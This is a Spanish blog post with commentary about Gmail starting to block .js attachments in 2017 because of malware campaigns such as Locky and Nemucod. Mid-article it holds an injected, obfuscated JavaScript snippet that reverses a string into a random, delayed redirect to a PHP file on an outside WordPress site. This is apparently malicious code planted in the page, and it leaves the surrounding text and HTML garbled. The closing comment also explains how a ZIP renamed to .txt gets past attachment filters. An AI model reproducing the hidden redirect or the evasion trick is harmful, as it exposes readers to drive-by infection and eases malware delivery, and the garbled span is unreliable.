Gmail empezará a bloquear los archivos .js, de JavaScript, adjuntos
El correo electrónico ha sido uno de los medios más utilizados para distribuir malware. Cuando un pirata informático iniciaba una campaña de distribución, adjuntaba un archivo binario con el virus (utilizando el conocido truco de la doble extensión) de manera que cuando la víctima recibía el archivo, pensando que era de otro tipo (por ejemplo, un documento) lo ejecutaba y terminaba infectado por el software malicioso en cuestión.
Debido a estas campañas, los principales proveedores de correo electrónico se vieron obligados a tomar una serie de medidas para proteger a los usuarios y mitigar todos estos ataques. Una de ellas, por ejemplo, fue el bloqueo de los archivos con extensiones .exe, .msc, y .bat, entre otros, al ser los más utilizados por estos piratas para enviar malware a través del correo.
Los tiempos han cambiado, y las técnicas de los piratas también. Por ello, Google ha confirmado que, a partir del próximo 13 de febrero de 2017, Gmail impedirá, junto a los formatos anteriores, el envío de archivos JavaScript adjuntos. De esta manera, si a partir de dicha fecha intentamos adjuntar un fichero JavaScript dentro de un correo electrónico cualquiera, veremos como Google lo bloquea por motivos de seguridad.
Gmail bloqueará archivos adjuntos JavaScript
Google se ha visto obligada a tomar esta decisión debido a que cada vez más piratas informáticos han empezado a distribuir amenazas mediante este tipo de archivos. Aunque el lenguaje JavaScript es ampliamente utilizado en el desarrollo web, cuando un usuario lo ejecuta en Windows, el sistema operativo lo procesa dentro del “Windows Script Host“, pudiendo descargar y ejecutar binarios sin problemas para llevar a cabo otras amenazas.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos-JavaScript-655×375.png” width=”655″ height=”375″ /></p>
<p>Solucionan una vulnerabilidad que ponía en riesgo <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todas las cuentas de Gmail
Otras formas de distribuir malware contra las que Gmail debería luchar:
Como hemos dicho, los archivos binarios como .exe o .bat ya han sido bloqueados, y en poco más de dos semanas lo serán también los archivos .js, sin embargo, hay muchas más formas de distribuir software malicioso a través del correo electrónico.
Tal como podemos leer en el apartado de soporte de Google, hasta la fecha, todos los adjuntos que bloquea Gmail son:
Ciertos tipos de archivos (bat, exe y otros 28 formatos más, a los que se suma en febrero el formato js).
Archivos comprimidos que contengan dichos archivos.
Archivos cuyo contenido está protegido con contraseña.
Archivos que incluyen un archivo comprimido.
Documentos con macros maliciosas.
Sin embargo, a pesar de los esfuerzos de Google por acabar con la distribución de software malicioso a través del correo electrónico, aún hay muchos otros frentes que los piratas utilizan para llevar a cabo sus ataques, como, por ejemplo, enviar los archivos adjuntos a través de Google Drive (aunque requiere más esfuerzo por ambas partes) o, en lugar de mandar el archivo adjunto enviar solo un enlace que, al acceder a él, se lleve a cabo la infección, evadiendo todas las capas de seguridad del sistema operativo utilizando, por ejemplo, un kit de exploits.
Ver información original al respecto en Fuente:
tos/#sthash.y0502BSH.dpuf
COMENTARIO:
Muy buena idea la de evitar el envio de anexados con extensión .JS, que es usado actualmente por muchos troyanos en general, ransomwares como LOCKY, downloaders como NEMUCOD, etc, asi que al controlar dicha extensión, con el consiguiente control también de los ZIP que contengan dichos ficheros, se evitará la proliferación de miles de mails maliciosos con dichos anexados, y con ello se frenará la propagación de muchos malwares que actualmente pululan por internet a través del correo electronico.
Lo malo es que enviando un ZIP anexado a un mail y renombrado a TXT , cuela y se entrega, y si se le dice en dicho mail al destinatario, que cambie la extensión del fichero TXT por la de ZIP para poder obtener los ficheros que se le envian, el malware llegará a su destino,
y solo si el cliente de Correo comprobara la estructura del fichero anexado, lo cual en Google (G-Mail) podrían hacer, se evitaría incluso dicha posibilidad, y ya que parece que alguien de ellos está al loro, solo haría falta que aplicaran la idea, a ver si nos leen …
saludos
ms, 26-1-2017
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.